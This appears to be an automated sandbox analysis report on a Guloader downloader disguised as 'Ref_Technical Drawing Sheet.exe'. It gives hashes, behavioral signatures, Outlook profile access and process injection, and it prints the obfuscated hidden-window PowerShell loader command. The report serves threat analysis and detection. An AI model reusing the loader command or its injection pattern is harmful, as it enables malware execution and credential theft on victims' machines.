Analysis
-
max time kernel
70s -
max time network
76s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
21/03/2024, 07:33
Static task
static1
Behavioral task
behavioral1
Sample
Ref_Technical Drawing Sheet.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Ref_Technical Drawing Sheet.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
Bedwarmer.ps1
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
Bedwarmer.ps1
Resource
win10v2004-20231215-en
General
-
Target
Ref_Technical Drawing Sheet.exe
-
Size
963KB
-
MD5
2f96e6fd36ceec8c32dcc6c7607a87bd
-
SHA1
89b9bd60c39a582da440112f12f939c90102d567
-
SHA256
11bfafb62ab5e5c115862409c849f069dc0903abf0f864783bea73472db19932
-
SHA512
755e29062263821fac7c37be3dd7e0b980804adbe301d1945c9098ca1cb8ae57f293a022a2e11677e404bac323b4e5995d4c57d45c2edb13595ff151547993b9
-
SSDEEP
12288:wbZfqmfr+7Iz6tuhHr2WX3rLKJQEKKHP9SxG4A1wF7dieRJ14BEtIX2UgGj+Xtah:wbZCmf67FtuZFX3KJQgl4KEoEoePUF3Z
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wabmig.exe Key opened \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wabmig.exe Key opened \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook wabmig.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 67 drive.google.com 68 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 2572 wabmig.exe 2572 wabmig.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3356 powershell.exe 2572 wabmig.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3356 set thread context of 2572 3356 powershell.exe 133 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe -
Suspicious behavior: MapViewOfSection 23 IoCs
pid Process 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe 3356 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3356 powershell.exe Token: SeDebugPrivilege 2572 wabmig.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4756 wrote to memory of 3356 4756 Ref_Technical Drawing Sheet.exe 89 PID 4756 wrote to memory of 3356 4756 Ref_Technical Drawing Sheet.exe 89 PID 4756 wrote to memory of 3356 4756 Ref_Technical Drawing Sheet.exe 89 PID 3356 wrote to memory of 3276 3356 powershell.exe 93 PID 3356 wrote to memory of 3276 3356 powershell.exe 93 PID 3356 wrote to memory of 3276 3356 powershell.exe 93 PID 3356 wrote to memory of 3916 3356 powershell.exe 111 PID 3356 wrote to memory of 3916 3356 powershell.exe 111 PID 3356 wrote to memory of 3916 3356 powershell.exe 111 PID 3356 wrote to memory of 4692 3356 powershell.exe 112 PID 3356 wrote to memory of 4692 3356 powershell.exe 112 PID 3356 wrote to memory of 4692 3356 powershell.exe 112 PID 3356 wrote to memory of 1008 3356 powershell.exe 113 PID 3356 wrote to memory of 1008 3356 powershell.exe 113 PID 3356 wrote to memory of 1008 3356 powershell.exe 113 PID 3356 wrote to memory of 1476 3356 powershell.exe 114 PID 3356 wrote to memory of 1476 3356 powershell.exe 114 PID 3356 wrote to memory of 1476 3356 powershell.exe 114 PID 3356 wrote to memory of 1628 3356 powershell.exe 115 PID 3356 wrote to memory of 1628 3356 powershell.exe 115 PID 3356 wrote to memory of 1628 3356 powershell.exe 115 PID 3356 wrote to memory of 4356 3356 powershell.exe 116 PID 3356 wrote to memory of 4356 3356 powershell.exe 116 PID 3356 wrote to memory of 4356 3356 powershell.exe 116 PID 3356 wrote to memory of 860 3356 powershell.exe 117 PID 3356 wrote to memory of 860 3356 powershell.exe 117 PID 3356 wrote to memory of 860 3356 powershell.exe 117 PID 3356 wrote to memory of 2724 3356 powershell.exe 118 PID 3356 wrote to memory of 2724 3356 powershell.exe 118 PID 3356 wrote to memory of 2724 3356 powershell.exe 118 PID 3356 wrote to memory of 1708 3356 powershell.exe 119 PID 3356 wrote to memory of 1708 3356 powershell.exe 119 PID 3356 wrote to memory of 1708 3356 powershell.exe 119 PID 3356 wrote to memory of 2168 3356 powershell.exe 120 PID 3356 wrote to memory of 2168 3356 powershell.exe 120 PID 3356 wrote to memory of 2168 3356 powershell.exe 120 PID 3356 wrote to memory of 660 3356 powershell.exe 121 PID 3356 wrote to memory of 660 3356 powershell.exe 121 PID 3356 wrote to memory of 660 3356 powershell.exe 121 PID 3356 wrote to memory of 3580 3356 powershell.exe 122 PID 3356 wrote to memory of 3580 3356 powershell.exe 122 PID 3356 wrote to memory of 3580 3356 powershell.exe 122 PID 3356 wrote to memory of 4396 3356 powershell.exe 123 PID 3356 wrote to memory of 4396 3356 powershell.exe 123 PID 3356 wrote to memory of 4396 3356 powershell.exe 123 PID 3356 wrote to memory of 4680 3356 powershell.exe 124 PID 3356 wrote to memory of 4680 3356 powershell.exe 124 PID 3356 wrote to memory of 4680 3356 powershell.exe 124 PID 3356 wrote to memory of 4492 3356 powershell.exe 125 PID 3356 wrote to memory of 4492 3356 powershell.exe 125 PID 3356 wrote to memory of 4492 3356 powershell.exe 125 PID 3356 wrote to memory of 64 3356 powershell.exe 126 PID 3356 wrote to memory of 64 3356 powershell.exe 126 PID 3356 wrote to memory of 64 3356 powershell.exe 126 PID 3356 wrote to memory of 232 3356 powershell.exe 127 PID 3356 wrote to memory of 232 3356 powershell.exe 127 PID 3356 wrote to memory of 232 3356 powershell.exe 127 PID 3356 wrote to memory of 2708 3356 powershell.exe 128 PID 3356 wrote to memory of 2708 3356 powershell.exe 128 PID 3356 wrote to memory of 2708 3356 powershell.exe 128 PID 3356 wrote to memory of 1824 3356 powershell.exe 129 PID 3356 wrote to memory of 1824 3356 powershell.exe 129 PID 3356 wrote to memory of 1824 3356 powershell.exe 129 PID 3356 wrote to memory of 1320 3356 powershell.exe 130 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wabmig.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wabmig.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Ref_Technical Drawing Sheet.exe"C:\Users\Admin\AppData\Local\Temp\Ref_Technical Drawing Sheet.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Trykimprgnerede=Get-Content 'C:\Users\Admin\AppData\Local\butikstiders\Sjunger\Bedwarmer.Hom';$Ekstraparlementarisk=$Trykimprgnerede.SubString(59534,3);.$Ekstraparlementarisk($Trykimprgnerede)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3356 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"3⤵PID:3276
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:3916
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:4692
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:1008
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:1476
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:1628
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:4356
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:860
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:2724
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:1708
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:2168
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:660
-
-
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵PID:3580
-
-
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵PID:4396
-
-
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵PID:4680
-
-
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵PID:4492
-
-
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵PID:64
-
-
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵PID:232
-
-
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵PID:2708
-
-
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵PID:1824
-
-
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵PID:1320
-
-
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵PID:3276
-
-
C:\Program Files (x86)\windows mail\wabmig.exe"C:\Program Files (x86)\windows mail\wabmig.exe"3⤵PID:3360
-
-
C:\Program Files (x86)\windows mail\wabmig.exe"C:\Program Files (x86)\windows mail\wabmig.exe"3⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2572
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
58KB
MD5aae5fcb1e66470ef7a08ea335b80ac05
SHA19422c0898c87a134c72c6ffa35c594d93dba9dc9
SHA2568bd9205c7c8f112ff5cba1307842eddccc18e20e227cccb7b74e6a24e686b8b0
SHA512031d187a47a9b687d6822f34e74029f2f1cf4eb8687dc2846a3d84efbf9d30d5459870842a22cdab89130915501e2593f79b2a32da5c266d382120e0a042b072
-
Filesize
347KB
MD51178f466a9ac164a3ca05ffd715235dc
SHA1e593a180adbbb864047e9dbc5e07a6d27a252139
SHA25638bea98d1ec5467345cf29e1a7f1ec9a25fbe7801c8a498ec05e97b6dbf9545b
SHA51261269e7303efba0f6d2790b780b9f4348567c6ad48481822201b37e13c17f255d35b368d109ba6c9d9a66d9af1adb7f2db9e3ec6ab1b351f80fce368f23a3650